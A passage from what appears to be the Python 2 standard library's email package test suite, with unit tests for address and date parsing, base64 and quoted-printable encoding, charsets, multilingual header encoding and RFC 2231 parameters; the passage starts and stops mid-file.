def test_parsedate_no_dayofweek(self):
eq = self.assertEqual
eq(utils.parsedate_tz('25 Feb 2003 13:47:26 -0800'),
(2003, 2, 25, 13, 47, 26, 0, 1, -1, -28800))
def test_parsedate_compact_no_dayofweek(self):
eq = self.assertEqual
eq(utils.parsedate_tz('5 Feb 2003 13:47:26 -0800'),
(2003, 2, 5, 13, 47, 26, 0, 1, -1, -28800))
def test_parsedate_acceptable_to_time_functions(self):
eq = self.assertEqual
timetup = utils.parsedate('5 Feb 2003 13:47:26 -0800')
t = int(time.mktime(timetup))
eq(time.localtime(t)[:6], timetup[:6])
eq(int(time.strftime('%Y', timetup)), 2003)
timetup = utils.parsedate_tz('5 Feb 2003 13:47:26 -0800')
t = int(time.mktime(timetup[:9]))
eq(time.localtime(t)[:6], timetup[:6])
eq(int(time.strftime('%Y', timetup[:9])), 2003)
def test_parseaddr_empty(self):
self.assertEqual(utils.parseaddr('<>'), ('', ''))
self.assertEqual(utils.formataddr(utils.parseaddr('<>')), '')
def test_noquote_dump(self):
self.assertEqual(
utils.formataddr(('A Silly Person', 'person@dom.ain')),
'A Silly Person <person@dom.ain>')
def test_escape_dump(self):
self.assertEqual(
utils.formataddr(('A (Very) Silly Person', 'person@dom.ain')),
r'"A \(Very\) Silly Person" <person@dom.ain>')
a = r'A \(Special\) Person'
b = 'person@dom.ain'
self.assertEqual(utils.parseaddr(utils.formataddr((a, b))), (a, b))
def test_escape_backslashes(self):
self.assertEqual(
utils.formataddr(('Arthur \Backslash\ Foobar', 'person@dom.ain')),
r'"Arthur \\Backslash\\ Foobar" <person@dom.ain>')
a = r'Arthur \Backslash\ Foobar'
b = 'person@dom.ain'
self.assertEqual(utils.parseaddr(utils.formataddr((a, b))), (a, b))
def test_name_with_dot(self):
x = 'John X. Doe <jxd@example.com>'
y = '"John X. Doe" <jxd@example.com>'
a, b = ('John X. Doe', 'jxd@example.com')
self.assertEqual(utils.parseaddr(x), (a, b))
self.assertEqual(utils.parseaddr(y), (a, b))
# formataddr() quotes the name if there's a dot in it
self.assertEqual(utils.formataddr((a, b)), y)
def test_multiline_from_comment(self):
x = """\
Foo
\tBar <foo@example.com>"""
self.assertEqual(utils.parseaddr(x), ('Foo Bar', 'foo@example.com'))
def test_quote_dump(self):
self.assertEqual(
utils.formataddr(('A Silly; Person', 'person@dom.ain')),
r'"A Silly; Person" <person@dom.ain>')
def test_fix_eols(self):
eq = self.assertEqual
eq(utils.fix_eols('hello'), 'hello')
eq(utils.fix_eols('hello\n'), 'hello\r\n')
eq(utils.fix_eols('hello\r'), 'hello\r\n')
eq(utils.fix_eols('hello\r\n'), 'hello\r\n')
eq(utils.fix_eols('hello\n\r'), 'hello\r\n\r\n')
def test_charset_richcomparisons(self):
eq = self.assertEqual
ne = self.failIfEqual
cset1 = Charset()
cset2 = Charset()
eq(cset1, 'us-ascii')
eq(cset1, 'US-ASCII')
eq(cset1, 'Us-AsCiI')
eq('us-ascii', cset1)
eq('US-ASCII', cset1)
eq('Us-AsCiI', cset1)
ne(cset1, 'usascii')
ne(cset1, 'USASCII')
ne(cset1, 'UsAsCiI')
ne('usascii', cset1)
ne('USASCII', cset1)
ne('UsAsCiI', cset1)
eq(cset1, cset2)
eq(cset2, cset1)
def test_getaddresses(self):
eq = self.assertEqual
eq(utils.getaddresses(['aperson@dom.ain (Al Person)',
'Bud Person <bperson@dom.ain>']),
[('Al Person', 'aperson@dom.ain'),
('Bud Person', 'bperson@dom.ain')])
def test_getaddresses_nasty(self):
eq = self.assertEqual
eq(utils.getaddresses(['foo: ;']), [('', '')])
eq(utils.getaddresses(
['[]*-- =~$']),
[('', ''), ('', ''), ('', '*--')])
eq(utils.getaddresses(
['foo: ;', '"Jason R. Mastaler" <jason@dom.ain>']),
[('', ''), ('Jason R. Mastaler', 'jason@dom.ain')])
def test_getaddresses_embedded_comment(self):
"""Test proper handling of a nested comment"""
eq = self.assertEqual
addrs = utils.getaddresses(['User ((nested comment)) <foo@bar.com>'])
eq(addrs[0][1], 'foo@bar.com')
def test_utils_quote_unquote(self):
eq = self.assertEqual
msg = Message()
msg.add_header('content-disposition', 'attachment',
filename='foo\\wacky"name')
eq(msg.get_filename(), 'foo\\wacky"name')
def test_get_body_encoding_with_bogus_charset(self):
charset = Charset('not a charset')
self.assertEqual(charset.get_body_encoding(), 'base64')
def test_get_body_encoding_with_uppercase_charset(self):
eq = self.assertEqual
msg = Message()
msg['Content-Type'] = 'text/plain; charset=UTF-8'
eq(msg['content-type'], 'text/plain; charset=UTF-8')
charsets = msg.get_charsets()
eq(len(charsets), 1)
eq(charsets[0], 'utf-8')
charset = Charset(charsets[0])
eq(charset.get_body_encoding(), 'base64')
msg.set_payload('hello world', charset=charset)
eq(msg.get_payload(), 'aGVsbG8gd29ybGQ=\n')
eq(msg.get_payload(decode=True), 'hello world')
eq(msg['content-transfer-encoding'], 'base64')
# Try another one
msg = Message()
msg['Content-Type'] = 'text/plain; charset="US-ASCII"'
charsets = msg.get_charsets()
eq(len(charsets), 1)
eq(charsets[0], 'us-ascii')
charset = Charset(charsets[0])
eq(charset.get_body_encoding(), encoders.encode_7or8bit)
msg.set_payload('hello world', charset=charset)
eq(msg.get_payload(), 'hello world')
eq(msg['content-transfer-encoding'], '7bit')
def test_charsets_case_insensitive(self):
lc = Charset('us-ascii')
uc = Charset('US-ASCII')
self.assertEqual(lc.get_body_encoding(), uc.get_body_encoding())
def test_partial_falls_inside_message_delivery_status(self):
eq = self.ndiffAssertEqual
# The Parser interface provides chunks of data to FeedParser in 8192
# byte gulps. SF bug #1076485 found one of those chunks inside
# message/delivery-status header block, which triggered an
# unreadline() of NeedMoreData.
msg = self._msgobj('msg_43.txt')
sfp = StringIO()
iterators._structure(msg, sfp)
eq(sfp.getvalue(), """\
multipart/report
text/plain
message/delivery-status
text/plain
text/plain
text/plain
text/plain
text/plain
text/plain
text/plain
text/plain
text/plain
text/plain
text/plain
text/plain
text/plain
text/plain
text/plain
text/plain
text/plain
text/plain
text/plain
text/plain
text/plain
text/plain
text/plain
text/plain
text/plain
text/plain
text/rfc822-headers
""")
# Test the iterator/generators
class TestIterators(TestEmailBase):
def test_body_line_iterator(self):
eq = self.assertEqual
neq = self.ndiffAssertEqual
# First a simple non-multipart message
msg = self._msgobj('msg_01.txt')
it = iterators.body_line_iterator(msg)
lines = list(it)
eq(len(lines), 6)
neq(EMPTYSTRING.join(lines), msg.get_payload())
# Now a more complicated multipart
msg = self._msgobj('msg_02.txt')
it = iterators.body_line_iterator(msg)
lines = list(it)
eq(len(lines), 43)
fp = openfile('msg_19.txt')
try:
neq(EMPTYSTRING.join(lines), fp.read())
finally:
fp.close()
def test_typed_subpart_iterator(self):
eq = self.assertEqual
msg = self._msgobj('msg_04.txt')
it = iterators.typed_subpart_iterator(msg, 'text')
lines = []
subparts = 0
for subpart in it:
subparts += 1
lines.append(subpart.get_payload())
eq(subparts, 2)
eq(EMPTYSTRING.join(lines), """\
a simple kind of mirror
to reflect upon our own
a simple kind of mirror
to reflect upon our own
""")
def test_typed_subpart_iterator_default_type(self):
eq = self.assertEqual
msg = self._msgobj('msg_03.txt')
it = iterators.typed_subpart_iterator(msg, 'text', 'plain')
lines = []
subparts = 0
for subpart in it:
subparts += 1
lines.append(subpart.get_payload())
eq(subparts, 1)
eq(EMPTYSTRING.join(lines), """\
Hi,
Do you like this message?
-Me
""")
class TestParsers(TestEmailBase):
def test_header_parser(self):
eq = self.assertEqual
# Parse only the headers of a complex multipart MIME document
fp = openfile('msg_02.txt')
try:
msg = HeaderParser().parse(fp)
finally:
fp.close()
eq(msg['from'], 'ppp-request@zzz.org')
eq(msg['to'], 'ppp@zzz.org')
eq(msg.get_content_type(), 'multipart/mixed')
self.failIf(msg.is_multipart())
self.failUnless(isinstance(msg.get_payload(), str))
def test_whitespace_continuation(self):
eq = self.assertEqual
# This message contains a line after the Subject: header that has only
# whitespace, but it is not empty!
msg = email.message_from_string("""\
From: aperson@dom.ain
To: bperson@dom.ain
Subject: the next line has a space on it
\x20
Date: Mon, 8 Apr 2002 15:09:19 -0400
Message-ID: spam
Here's the message body
""")
eq(msg['subject'], 'the next line has a space on it\n ')
eq(msg['message-id'], 'spam')
eq(msg.get_payload(), "Here's the message body\n")
def test_whitespace_continuation_last_header(self):
eq = self.assertEqual
# Like the previous test, but the subject line is the last
# header.
msg = email.message_from_string("""\
From: aperson@dom.ain
To: bperson@dom.ain
Date: Mon, 8 Apr 2002 15:09:19 -0400
Message-ID: spam
Subject: the next line has a space on it
\x20
Here's the message body
""")
eq(msg['subject'], 'the next line has a space on it\n ')
eq(msg['message-id'], 'spam')
eq(msg.get_payload(), "Here's the message body\n")
def test_crlf_separation(self):
eq = self.assertEqual
fp = openfile('msg_26.txt', mode='rb')
try:
msg = Parser().parse(fp)
finally:
fp.close()
eq(len(msg.get_payload()), 2)
part1 = msg.get_payload(0)
eq(part1.get_content_type(), 'text/plain')
eq(part1.get_payload(), 'Simple email with attachment.\r\n\r\n')
part2 = msg.get_payload(1)
eq(part2.get_content_type(), 'application/riscos')
def test_multipart_digest_with_extra_mime_headers(self):
eq = self.assertEqual
neq = self.ndiffAssertEqual
fp = openfile('msg_28.txt')
try:
msg = email.message_from_file(fp)
finally:
fp.close()
# Structure is:
# multipart/digest
# message/rfc822
# text/plain
# message/rfc822
# text/plain
eq(msg.is_multipart(), 1)
eq(len(msg.get_payload()), 2)
part1 = msg.get_payload(0)
eq(part1.get_content_type(), 'message/rfc822')
eq(part1.is_multipart(), 1)
eq(len(part1.get_payload()), 1)
part1a = part1.get_payload(0)
eq(part1a.is_multipart(), 0)
eq(part1a.get_content_type(), 'text/plain')
neq(part1a.get_payload(), 'message 1\n')
# next message/rfc822
part2 = msg.get_payload(1)
eq(part2.get_content_type(), 'message/rfc822')
eq(part2.is_multipart(), 1)
eq(len(part2.get_payload()), 1)
part2a = part2.get_payload(0)
eq(part2a.is_multipart(), 0)
eq(part2a.get_content_type(), 'text/plain')
neq(part2a.get_payload(), 'message 2\n')
def test_three_lines(self):
# A bug report by Andrew McNamara
lines = ['From: Andrew Person <aperson@dom.ain',
'Subject: Test',
'Date: Tue, 20 Aug 2002 16:43:45 +1000']
msg = email.message_from_string(NL.join(lines))
self.assertEqual(msg['date'], 'Tue, 20 Aug 2002 16:43:45 +1000')
def test_strip_line_feed_and_carriage_return_in_headers(self):
eq = self.assertEqual
# For [ 1002475 ] email message parser doesn't handle \r\n correctly
value1 = 'text'
value2 = 'more text'
m = 'Header: %s\r\nNext-Header: %s\r\n\r\nBody\r\n\r\n' % (
value1, value2)
msg = email.message_from_string(m)
eq(msg.get('Header'), value1)
eq(msg.get('Next-Header'), value2)
def test_rfc2822_header_syntax(self):
eq = self.assertEqual
m = '>From: foo\nFrom: bar\n!"#QUX;~: zoo\n\nbody'
msg = email.message_from_string(m)
eq(len(msg.keys()), 3)
keys = msg.keys()
keys.sort()
eq(keys, ['!"#QUX;~', '>From', 'From'])
eq(msg.get_payload(), 'body')
def test_rfc2822_space_not_allowed_in_header(self):
eq = self.assertEqual
m = '>From foo@example.com 11:25:53\nFrom: bar\n!"#QUX;~: zoo\n\nbody'
msg = email.message_from_string(m)
eq(len(msg.keys()), 0)
def test_rfc2822_one_character_header(self):
eq = self.assertEqual
m = 'A: first header\nB: second header\nCC: third header\n\nbody'
msg = email.message_from_string(m)
headers = msg.keys()
headers.sort()
eq(headers, ['A', 'B', 'CC'])
eq(msg.get_payload(), 'body')
class TestBase64(unittest.TestCase):
def test_len(self):
eq = self.assertEqual
eq(base64mime.base64_len('hello'),
len(base64mime.encode('hello', eol='')))
for size in range(15):
if size == 0 : bsize = 0
elif size <= 3 : bsize = 4
elif size <= 6 : bsize = 8
elif size <= 9 : bsize = 12
elif size <= 12: bsize = 16
else : bsize = 20
eq(base64mime.base64_len('x'*size), bsize)
def test_decode(self):
eq = self.assertEqual
eq(base64mime.decode(''), '')
eq(base64mime.decode('aGVsbG8='), 'hello')
eq(base64mime.decode('aGVsbG8=', 'X'), 'hello')
eq(base64mime.decode('aGVsbG8NCndvcmxk\n', 'X'), 'helloXworld')
def test_encode(self):
eq = self.assertEqual
eq(base64mime.encode(''), '')
eq(base64mime.encode('hello'), 'aGVsbG8=\n')
# Test the binary flag
eq(base64mime.encode('hello\n'), 'aGVsbG8K\n')
eq(base64mime.encode('hello\n', 0), 'aGVsbG8NCg==\n')
# Test the maxlinelen arg
eq(base64mime.encode('xxxx ' * 20, maxlinelen=40), """\
eHh4eCB4eHh4IHh4eHggeHh4eCB4eHh4IHh4eHgg
eHh4eCB4eHh4IHh4eHggeHh4eCB4eHh4IHh4eHgg
eHh4eCB4eHh4IHh4eHggeHh4eCB4eHh4IHh4eHgg
eHh4eCB4eHh4IA==
""")
# Test the eol argument
eq(base64mime.encode('xxxx ' * 20, maxlinelen=40, eol='\r\n'), """\
eHh4eCB4eHh4IHh4eHggeHh4eCB4eHh4IHh4eHgg\r
eHh4eCB4eHh4IHh4eHggeHh4eCB4eHh4IHh4eHgg\r
eHh4eCB4eHh4IHh4eHggeHh4eCB4eHh4IHh4eHgg\r
eHh4eCB4eHh4IA==\r
""")
def test_header_encode(self):
eq = self.assertEqual
he = base64mime.header_encode
eq(he('hello'), '=?iso-8859-1?b?aGVsbG8=?=')
eq(he('hello\nworld'), '=?iso-8859-1?b?aGVsbG8NCndvcmxk?=')
# Test the charset option
eq(he('hello', charset='iso-8859-2'), '=?iso-8859-2?b?aGVsbG8=?=')
# Test the keep_eols flag
eq(he('hello\nworld', keep_eols=True),
'=?iso-8859-1?b?aGVsbG8Kd29ybGQ=?=')
# Test the maxlinelen argument
eq(he('xxxx ' * 20, maxlinelen=40), """\
=?iso-8859-1?b?eHh4eCB4eHh4IHh4eHggeHg=?=
=?iso-8859-1?b?eHggeHh4eCB4eHh4IHh4eHg=?=
=?iso-8859-1?b?IHh4eHggeHh4eCB4eHh4IHg=?=
=?iso-8859-1?b?eHh4IHh4eHggeHh4eCB4eHg=?=
=?iso-8859-1?b?eCB4eHh4IHh4eHggeHh4eCA=?=
=?iso-8859-1?b?eHh4eCB4eHh4IHh4eHgg?=""")
# Test the eol argument
eq(he('xxxx ' * 20, maxlinelen=40, eol='\r\n'), """\
=?iso-8859-1?b?eHh4eCB4eHh4IHh4eHggeHg=?=\r
=?iso-8859-1?b?eHggeHh4eCB4eHh4IHh4eHg=?=\r
=?iso-8859-1?b?IHh4eHggeHh4eCB4eHh4IHg=?=\r
=?iso-8859-1?b?eHh4IHh4eHggeHh4eCB4eHg=?=\r
=?iso-8859-1?b?eCB4eHh4IHh4eHggeHh4eCA=?=\r
=?iso-8859-1?b?eHh4eCB4eHh4IHh4eHgg?=""")
class TestQuopri(unittest.TestCase):
def setUp(self):
self.hlit = [chr(x) for x in range(ord('a'), ord('z')+1)] + \
[chr(x) for x in range(ord('A'), ord('Z')+1)] + \
[chr(x) for x in range(ord('0'), ord('9')+1)] + \
['!', '*', '+', '-', '/', ' ']
self.hnon = [chr(x) for x in range(256) if chr(x) not in self.hlit]
assert len(self.hlit) + len(self.hnon) == 256
self.blit = [chr(x) for x in range(ord(' '), ord('~')+1)] + ['\t']
self.blit.remove('=')
self.bnon = [chr(x) for x in range(256) if chr(x) not in self.blit]
assert len(self.blit) + len(self.bnon) == 256
def test_header_quopri_check(self):
for c in self.hlit:
self.failIf(quoprimime.header_quopri_check(c))
for c in self.hnon:
self.failUnless(quoprimime.header_quopri_check(c))
def test_body_quopri_check(self):
for c in self.blit:
self.failIf(quoprimime.body_quopri_check(c))
for c in self.bnon:
self.failUnless(quoprimime.body_quopri_check(c))
def test_header_quopri_len(self):
eq = self.assertEqual
hql = quoprimime.header_quopri_len
enc = quoprimime.header_encode
for s in ('hello', 'h@e@l@l@o@'):
# Empty charset and no line-endings. 7 == RFC chrome
eq(hql(s), len(enc(s, charset='', eol=''))-7)
for c in self.hlit:
eq(hql(c), 1)
for c in self.hnon:
eq(hql(c), 3)
def test_body_quopri_len(self):
eq = self.assertEqual
bql = quoprimime.body_quopri_len
for c in self.blit:
eq(bql(c), 1)
for c in self.bnon:
eq(bql(c), 3)
def test_quote_unquote_idempotent(self):
for x in range(256):
c = chr(x)
self.assertEqual(quoprimime.unquote(quoprimime.quote(c)), c)
def test_header_encode(self):
eq = self.assertEqual
he = quoprimime.header_encode
eq(he('hello'), '=?iso-8859-1?q?hello?=')
eq(he('hello\nworld'), '=?iso-8859-1?q?hello=0D=0Aworld?=')
# Test the charset option
eq(he('hello', charset='iso-8859-2'), '=?iso-8859-2?q?hello?=')
# Test the keep_eols flag
eq(he('hello\nworld', keep_eols=True), '=?iso-8859-1?q?hello=0Aworld?=')
# Test a non-ASCII character
eq(he('hello\xc7there'), '=?iso-8859-1?q?hello=C7there?=')
# Test the maxlinelen argument
eq(he('xxxx ' * 20, maxlinelen=40), """\
=?iso-8859-1?q?xxxx_xxxx_xxxx_xxxx_xx?=
=?iso-8859-1?q?xx_xxxx_xxxx_xxxx_xxxx?=
=?iso-8859-1?q?_xxxx_xxxx_xxxx_xxxx_x?=
=?iso-8859-1?q?xxx_xxxx_xxxx_xxxx_xxx?=
=?iso-8859-1?q?x_xxxx_xxxx_?=""")
# Test the eol argument
eq(he('xxxx ' * 20, maxlinelen=40, eol='\r\n'), """\
=?iso-8859-1?q?xxxx_xxxx_xxxx_xxxx_xx?=\r
=?iso-8859-1?q?xx_xxxx_xxxx_xxxx_xxxx?=\r
=?iso-8859-1?q?_xxxx_xxxx_xxxx_xxxx_x?=\r
=?iso-8859-1?q?xxx_xxxx_xxxx_xxxx_xxx?=\r
=?iso-8859-1?q?x_xxxx_xxxx_?=""")
def test_decode(self):
eq = self.assertEqual
eq(quoprimime.decode(''), '')
eq(quoprimime.decode('hello'), 'hello')
eq(quoprimime.decode('hello', 'X'), 'hello')
eq(quoprimime.decode('hello\nworld', 'X'), 'helloXworld')
def test_encode(self):
eq = self.assertEqual
eq(quoprimime.encode(''), '')
eq(quoprimime.encode('hello'), 'hello')
# Test the binary flag
eq(quoprimime.encode('hello\r\nworld'), 'hello\nworld')
eq(quoprimime.encode('hello\r\nworld', 0), 'hello\nworld')
# Test the maxlinelen arg
eq(quoprimime.encode('xxxx ' * 20, maxlinelen=40), """\
xxxx xxxx xxxx xxxx xxxx xxxx xxxx xxxx=
xxxx xxxx xxxx xxxx xxxx xxxx xxxx xxx=
x xxxx xxxx xxxx xxxx=20""")
# Test the eol argument
eq(quoprimime.encode('xxxx ' * 20, maxlinelen=40, eol='\r\n'), """\
xxxx xxxx xxxx xxxx xxxx xxxx xxxx xxxx=\r
xxxx xxxx xxxx xxxx xxxx xxxx xxxx xxx=\r
x xxxx xxxx xxxx xxxx=20""")
eq(quoprimime.encode("""\
one line
two line"""), """\
one line
two line""")
# Test the Charset class
class TestCharset(unittest.TestCase):
def tearDown(self):
from email import charset as CharsetModule
try:
del CharsetModule.CHARSETS['fake']
except KeyError:
pass
def test_idempotent(self):
eq = self.assertEqual
# Make sure us-ascii = no Unicode conversion
c = Charset('us-ascii')
s = 'Hello World!'
sp = c.to_splittable(s)
eq(s, c.from_splittable(sp))
# test 8-bit idempotency with us-ascii
s = '\xa4\xa2\xa4\xa4\xa4\xa6\xa4\xa8\xa4\xaa'
sp = c.to_splittable(s)
eq(s, c.from_splittable(sp))
def test_body_encode(self):
eq = self.assertEqual
# Try a charset with QP body encoding
c = Charset('iso-8859-1')
eq('hello w=F6rld', c.body_encode('hello w\xf6rld'))
# Try a charset with Base64 body encoding
c = Charset('utf-8')
eq('aGVsbG8gd29ybGQ=\n', c.body_encode('hello world'))
# Try a charset with None body encoding
c = Charset('us-ascii')
eq('hello world', c.body_encode('hello world'))
# Try the convert argument, where input codec <> output codec
c = Charset('euc-jp')
# With apologies to Tokio Kikuchi ;)
try:
eq('\x1b$B5FCO;~IW\x1b(B',
c.body_encode('\xb5\xc6\xc3\xcf\xbb\xfe\xc9\xd7'))
eq('\xb5\xc6\xc3\xcf\xbb\xfe\xc9\xd7',
c.body_encode('\xb5\xc6\xc3\xcf\xbb\xfe\xc9\xd7', False))
except LookupError:
# We probably don't have the Japanese codecs installed
pass
# Testing SF bug #625509, which we have to fake, since there are no
# built-in encodings where the header encoding is QP but the body
# encoding is not.
from email import charset as CharsetModule
CharsetModule.add_charset('fake', CharsetModule.QP, None)
c = Charset('fake')
eq('hello w\xf6rld', c.body_encode('hello w\xf6rld'))
def test_unicode_charset_name(self):
charset = Charset(u'us-ascii')
self.assertEqual(str(charset), 'us-ascii')
self.assertRaises(errors.CharsetError, Charset, 'asc\xffii')
# Test multilingual MIME headers.
class TestHeader(TestEmailBase):
def test_simple(self):
eq = self.ndiffAssertEqual
h = Header('Hello World!')
eq(h.encode(), 'Hello World!')
h.append(' Goodbye World!')
eq(h.encode(), 'Hello World! Goodbye World!')
def test_simple_surprise(self):
eq = self.ndiffAssertEqual
h = Header('Hello World!')
eq(h.encode(), 'Hello World!')
h.append('Goodbye World!')
eq(h.encode(), 'Hello World! Goodbye World!')
def test_header_needs_no_decoding(self):
h = 'no decoding needed'
self.assertEqual(decode_header(h), [(h, None)])
def test_long(self):
h = Header("I am the very model of a modern Major-General; I've information vegetable, animal, and mineral; I know the kings of England, and I quote the fights historical from Marathon to Waterloo, in order categorical; I'm very well acquainted, too, with matters mathematical; I understand equations, both the simple and quadratical; about binomial theorem I'm teeming with a lot o' news, with many cheerful facts about the square of the hypotenuse.",
maxlinelen=76)
for l in h.encode(splitchars=' ').split('\n '):
self.failUnless(len(l) <= 76)
def test_multilingual(self):
eq = self.ndiffAssertEqual
g = Charset("iso-8859-1")
cz = Charset("iso-8859-2")
utf8 = Charset("utf-8")
g_head = "Die Mieter treten hier ein werden mit einem Foerderband komfortabel den Korridor entlang, an s\xfcdl\xfcndischen Wandgem\xe4lden vorbei, gegen die rotierenden Klingen bef\xf6rdert. "
cz_head = "Finan\xe8ni metropole se hroutily pod tlakem jejich d\xf9vtipu.. "
utf8_head = u"\u6b63\u78ba\u306b\u8a00\u3046\u3068\u7ffb\u8a33\u306f\u3055\u308c\u3066\u3044\u307e\u305b\u3093\u3002\u4e00\u90e8\u306f\u30c9\u30a4\u30c4\u8a9e\u3067\u3059\u304c\u3001\u3042\u3068\u306f\u3067\u305f\u3089\u3081\u3067\u3059\u3002\u5b9f\u969b\u306b\u306f\u300cWenn ist das Nunstuck git und Slotermeyer? Ja! Beiherhund das Oder die Flipperwaldt gersput.\u300d\u3068\u8a00\u3063\u3066\u3044\u307e\u3059\u3002".encode("utf-8")
h = Header(g_head, g)
h.append(cz_head, cz)
h.append(utf8_head, utf8)
enc = h.encode()
eq(enc, """\
=?iso-8859-1?q?Die_Mieter_treten_hier_ein_werden_mit_einem_Foerderband_ko?=
=?iso-8859-1?q?mfortabel_den_Korridor_entlang=2C_an_s=FCdl=FCndischen_Wan?=
=?iso-8859-1?q?dgem=E4lden_vorbei=2C_gegen_die_rotierenden_Klingen_bef=F6?=
=?iso-8859-1?q?rdert=2E_?= =?iso-8859-2?q?Finan=E8ni_metropole_se_hroutily?=
=?iso-8859-2?q?_pod_tlakem_jejich_d=F9vtipu=2E=2E_?= =?utf-8?b?5q2j56K6?=
=?utf-8?b?44Gr6KiA44GG44Go57+76Kiz44Gv44GV44KM44Gm44GE44G+44Gb44KT44CC?=
=?utf-8?b?5LiA6YOo44Gv44OJ44Kk44OE6Kqe44Gn44GZ44GM44CB44GC44Go44Gv44Gn?=
=?utf-8?b?44Gf44KJ44KB44Gn44GZ44CC5a6f6Zqb44Gr44Gv44CMV2VubiBpc3QgZGFz?=
=?utf-8?q?_Nunstuck_git_und_Slotermeyer=3F_Ja!_Beiherhund_das_Oder_die_Fl?=
=?utf-8?b?aXBwZXJ3YWxkdCBnZXJzcHV0LuOAjeOBqOiogOOBo+OBpuOBhOOBvuOBmQ==?=
=?utf-8?b?44CC?=""")
eq(decode_header(enc),
[(g_head, "iso-8859-1"), (cz_head, "iso-8859-2"),
(utf8_head, "utf-8")])
ustr = unicode(h)
eq(ustr.encode('utf-8'),
'Die Mieter treten hier ein werden mit einem Foerderband '
'komfortabel den Korridor entlang, an s\xc3\xbcdl\xc3\xbcndischen '
'Wandgem\xc3\xa4lden vorbei, gegen die rotierenden Klingen '
'bef\xc3\xb6rdert. Finan\xc4\x8dni metropole se hroutily pod '
'tlakem jejich d\xc5\xafvtipu.. \xe6\xad\xa3\xe7\xa2\xba\xe3\x81'
'\xab\xe8\xa8\x80\xe3\x81\x86\xe3\x81\xa8\xe7\xbf\xbb\xe8\xa8\xb3'
'\xe3\x81\xaf\xe3\x81\x95\xe3\x82\x8c\xe3\x81\xa6\xe3\x81\x84\xe3'
'\x81\xbe\xe3\x81\x9b\xe3\x82\x93\xe3\x80\x82\xe4\xb8\x80\xe9\x83'
'\xa8\xe3\x81\xaf\xe3\x83\x89\xe3\x82\xa4\xe3\x83\x84\xe8\xaa\x9e'
'\xe3\x81\xa7\xe3\x81\x99\xe3\x81\x8c\xe3\x80\x81\xe3\x81\x82\xe3'
'\x81\xa8\xe3\x81\xaf\xe3\x81\xa7\xe3\x81\x9f\xe3\x82\x89\xe3\x82'
'\x81\xe3\x81\xa7\xe3\x81\x99\xe3\x80\x82\xe5\xae\x9f\xe9\x9a\x9b'
'\xe3\x81\xab\xe3\x81\xaf\xe3\x80\x8cWenn ist das Nunstuck git '
'und Slotermeyer? Ja! Beiherhund das Oder die Flipperwaldt '
'gersput.\xe3\x80\x8d\xe3\x81\xa8\xe8\xa8\x80\xe3\x81\xa3\xe3\x81'
'\xa6\xe3\x81\x84\xe3\x81\xbe\xe3\x81\x99\xe3\x80\x82')
# Test make_header()
newh = make_header(decode_header(enc))
eq(newh, enc)
def test_header_ctor_default_args(self):
eq = self.ndiffAssertEqual
h = Header()
eq(h, '')
h.append('foo', Charset('iso-8859-1'))
eq(h, '=?iso-8859-1?q?foo?=')
def test_explicit_maxlinelen(self):
eq = self.ndiffAssertEqual
hstr = 'A very long line that must get split to something other than at the 76th character boundary to test the non-default behavior'
h = Header(hstr)
eq(h.encode(), '''\
A very long line that must get split to something other than at the 76th
character boundary to test the non-default behavior''')
h = Header(hstr, header_name='Subject')
eq(h.encode(), '''\
A very long line that must get split to something other than at the
76th character boundary to test the non-default behavior''')
h = Header(hstr, maxlinelen=1024, header_name='Subject')
eq(h.encode(), hstr)
def test_us_ascii_header(self):
eq = self.assertEqual
s = 'hello'
x = decode_header(s)
eq(x, [('hello', None)])
h = make_header(x)
eq(s, h.encode())
def test_string_charset(self):
eq = self.assertEqual
h = Header()
h.append('hello', 'iso-8859-1')
eq(h, '=?iso-8859-1?q?hello?=')
## def test_unicode_error(self):
## raises = self.assertRaises
## raises(UnicodeError, Header, u'[P\xf6stal]', 'us-ascii')
## raises(UnicodeError, Header, '[P\xf6stal]', 'us-ascii')
## h = Header()
## raises(UnicodeError, h.append, u'[P\xf6stal]', 'us-ascii')
## raises(UnicodeError, h.append, '[P\xf6stal]', 'us-ascii')
## raises(UnicodeError, Header, u'\u83ca\u5730\u6642\u592b', 'iso-8859-1')
def test_utf8_shortest(self):
eq = self.assertEqual
h = Header(u'p\xf6stal', 'utf-8')
eq(h.encode(), '=?utf-8?q?p=C3=B6stal?=')
h = Header(u'\u83ca\u5730\u6642\u592b', 'utf-8')
eq(h.encode(), '=?utf-8?b?6I+K5Zyw5pmC5aSr?=')
def test_bad_8bit_header(self):
raises = self.assertRaises
eq = self.assertEqual
x = 'Ynwp4dUEbay Auction Semiar- No Charge \x96 Earn Big'
raises(UnicodeError, Header, x)
h = Header()
raises(UnicodeError, h.append, x)
eq(str(Header(x, errors='replace')), x)
h.append(x, errors='replace')
eq(str(h), x)
def test_encoded_adjacent_nonencoded(self):
eq = self.assertEqual
h = Header()
h.append('hello', 'iso-8859-1')
h.append('world')
s = h.encode()
eq(s, '=?iso-8859-1?q?hello?= world')
h = make_header(decode_header(s))
eq(h.encode(), s)
def test_whitespace_eater(self):
eq = self.assertEqual
s = 'Subject: =?koi8-r?b?8NLP18XSy8EgzsEgxsnOwczYztk=?= =?koi8-r?q?=CA?= zz.'
parts = decode_header(s)
eq(parts, [('Subject:', None), ('\xf0\xd2\xcf\xd7\xc5\xd2\xcb\xc1 \xce\xc1 \xc6\xc9\xce\xc1\xcc\xd8\xce\xd9\xca', 'koi8-r'), ('zz.', None)])
hdr = make_header(parts)
eq(hdr.encode(),
'Subject: =?koi8-r?b?8NLP18XSy8EgzsEgxsnOwczYztnK?= zz.')
def test_broken_base64_header(self):
raises = self.assertRaises
s = 'Subject: =?EUC-KR?B?CSixpLDtKSC/7Liuvsax4iC6uLmwMcijIKHaILzSwd/H0SC8+LCjwLsgv7W/+Mj3IQ?='
raises(errors.HeaderParseError, decode_header, s)
# Test RFC 2231 header parameters (en/de)coding
class TestRFC2231(TestEmailBase):
def test_get_param(self):
eq = self.assertEqual
msg = self._msgobj('msg_29.txt')
eq(msg.get_param('title'),
('us-ascii', 'en', 'This is even more ***fun*** isn\'t it!'))
eq(msg.get_param('title', unquote=False),
('us-ascii', 'en', '"This is even more ***fun*** isn\'t it!"'))
def test_set_param(self):
eq = self.assertEqual
msg = Message()
msg.set_param('title', 'This is even more ***fun*** isn\'t it!',
charset='us-ascii')
eq(msg.get_param('title'),
('us-ascii', '', 'This is even more ***fun*** isn\'t it!'))
msg.set_param('title', 'This is even more ***fun*** isn\'t it!',
charset='us-ascii', language='en')
eq(msg.get_param('title'),
('us-ascii', 'en', 'This is even more ***fun*** isn\'t it!'))
msg = self._msgobj('msg_01.txt')
msg.set_param('title', 'This is even more ***fun*** isn\'t it!',
charset='us-ascii', language='en')
eq(msg.as_string(), """\
